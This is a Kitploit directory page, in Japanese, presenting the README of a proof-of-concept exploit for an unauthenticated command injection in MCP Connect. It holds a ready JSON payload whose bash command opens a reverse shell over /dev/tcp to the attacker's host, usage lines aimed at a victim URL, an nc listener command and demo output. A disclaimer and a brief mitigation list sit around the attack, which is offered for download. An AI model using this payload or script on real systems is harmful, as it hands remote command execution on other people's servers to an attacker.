Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744 — CVE-2026-23744の概念実証エクスプロイト。MCP Connectにおける未認証のコマンドインジェクションにより、リモートコード実行とリバースシェルを引き起こします。 | Kitploit
ツール/GitHubGitHub/cylock11/cve-2026-23744
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubcylock11/cve-2026-23744

CVE-2026-23744

CVE-2026-23744の概念実証エクスプロイト。MCP Connectにおける未認証のコマンドインジェクションにより、リモートコード実行とリバースシェルを引き起こします。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 — MCP Connect RCE via Unauthenticated Command Injection

Python Category Type License

⚠️ 免責事項: このリポジトリは教育およびセキュリティ研究のみを目的としています。明示的な許可なくシステムに対してこのエクスプロイトを使用することは違法です。著者はこのコードの悪用について一切の責任を負いません。


📌 脆弱性の説明

この脆弱性は /api/mcp/connect エンドポイントに存在し、認証されていない攻撃者が悪意のある設定を持つ任意のMCP(Model Context Protocol)サーバーを登録することを可能にします。command フィールドとその args に対する検証やサニタイズが存在しないため、Webプロセスの権限でサーバー上で直接実行されるオペレーティングシステムコマンドを注入することが可能です。

これにより、侵害されたシステム上で リバースシェル を取得するために悪用できる リモートコード実行(RCE) が発生します。


🧠 技術的詳細

フィールド詳細
タイプRemote Code Execution (RCE)
ベクターネットワーク(認証なしのHTTP POST)
エンドポイント/api/mcp/connect
深刻度🔴 クリティカル
認証不要
影響サーバーの完全な制御

悪意のあるペイロード

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

サーバーはこの設定を処理し、提供された引数で bash コマンドを呼び出し、攻撃者への逆TCP接続を確立します。


🛠️ 要件

  • Python 3.x
  • 以下のライブラリ:
root@kitploit:~
pip install requests termcolor

🚀 使用方法

root@kitploit:~
python3 exploit.py -l <TU_IP> -u <URL_OBJETIVO>

パラメータ

パラメータ説明例
-lあなたのIP(シェルを受信する場所)192.168.1.50
-uターゲットのベースURLhttps://victim.com

完全な例

ターミナル1 — リスナー:

root@kitploit:~
nc -nlvp 443

ターミナル2 — エクスプロイト:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 デモ

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

リクエストが送信されると、ポート 443 のリスナーは侵害されたサーバーの対話型シェルを持つ逆接続を受信します。


🛡️ 緩和策

  • /api/mcp/connect のbody内のすべてのフィールドを処理する前に検証およびサニタイズする。
  • エンドポイントを認証し、特権を持つユーザーのみにアクセスを制限する。
  • ユーザー入力から直接システムコマンドを決して実行しない。
  • 許可されたコマンドのホワイトリストを実装する。
  • Webサーバープロセスに最小権限の原則を適用する。

📁 リポジトリ構造

root@kitploit:~
.
├── exploit.py       # エクスプロイトのメインスクリプト
└── README.md        # このファイル

👤 著者

オフェンシブセキュリティ研究を目的として Jorge Arana Fedriani によって開発されました。

ツールをダウンロード